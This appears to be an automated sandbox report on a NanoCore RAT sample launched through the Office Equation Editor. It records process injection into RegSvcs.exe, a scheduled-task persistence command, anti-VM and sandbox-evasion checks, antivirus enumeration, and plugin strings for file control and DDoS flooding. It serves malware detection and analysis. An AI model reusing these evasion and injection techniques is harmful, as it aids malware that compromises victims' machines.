Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2364, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2548 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2212 Thread sleep time: -41804s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3004 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003F0BB6 GetSystemInfo, 9_2_003F0BB6
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 41804 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000006.00000002.483692366.000000000059F000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regions
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000 Jump to behavior
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 420000 Jump to behavior
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 422000 Jump to behavior
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 7EFDE008 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\Public\vbc.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\smsBuojZSZn' /XML 'C:\Users\user\AppData\Local\Temp\tmpC2C3.tmp' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Jump to behavior
Source: RegSvcs.exe, 00000009.00000002.691723264.000000000287C000.00000004.00000001.sdmp Binary or memory string: Program ManagerH
Source: RegSvcs.exe, 00000009.00000002.691723264.000000000287C000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000009.00000002.690532668.00000000005D7000.00000004.00000020.sdmp Binary or memory string: ]Program Manager
Source: RegSvcs.exe, 00000009.00000002.691263704.0000000000EF0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 00000009.00000002.691723264.000000000287C000.00000004.00000001.sdmp Binary or memory string: Program Manager``H
Source: RegSvcs.exe, 00000009.00000002.690564446.00000000005EF000.00000004.00000020.sdmp Binary or memory string: _Program Managerknown.
Source: RegSvcs.exe, 00000009.00000002.691263704.0000000000EF0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: RegSvcs.exe, 00000009.00000002.691263704.0000000000EF0000.00000002.00020000.sdmp Binary or memory string: Program Manager<
Source: RegSvcs.exe, 00000009.00000002.691723264.000000000287C000.00000004.00000001.sdmp Binary or memory string: Program Manager<
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003F2E76 GetSystemTimes, 9_2_003F2E76
Source: C:\Users\Public\vbc.exe Code function: 6_2_0013A2F6 GetUserNameW, 6_2_0013A2F6

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

barindex
Yara detected Nanocore RAT
Source: Yara match File source: 6.2.vbc.exe.3981e88.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.e30000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3973018.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3973018.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.e34629.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.e30000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3977641.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.3981e88.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.37369e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.692216842.0000000003971000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2624, type: MEMORYSTR

Remote Access Functionality:

barindex
Detected Nanocore Rat
Source: vbc.exe, 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000009.00000002.691051857.0000000000D30000.00000004.00020000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000009.00000002.691051857.0000000000D30000.00000004.00020000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 00000009.00000002.690789448.0000000000800000.00000004.00020000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 00000009.00000002.690837400.0000000000A00000.00000004.00020000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 00000009.00000002.690646997.00000000006E0000.00000004.00020000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 00000009.00000002.691445743.0000000002781000.00000004.00000001.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Yara detected Nanocore RAT
Source: Yara match File source: 6.2.vbc.exe.3981e88.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.e30000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3973018.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3973018.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.e34629.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.e30000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3977641.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.3981e88.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.37369e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.692216842.0000000003971000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2624, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003F26E2 bind, 9_2_003F26E2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003F2690 bind, 9_2_003F2690
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs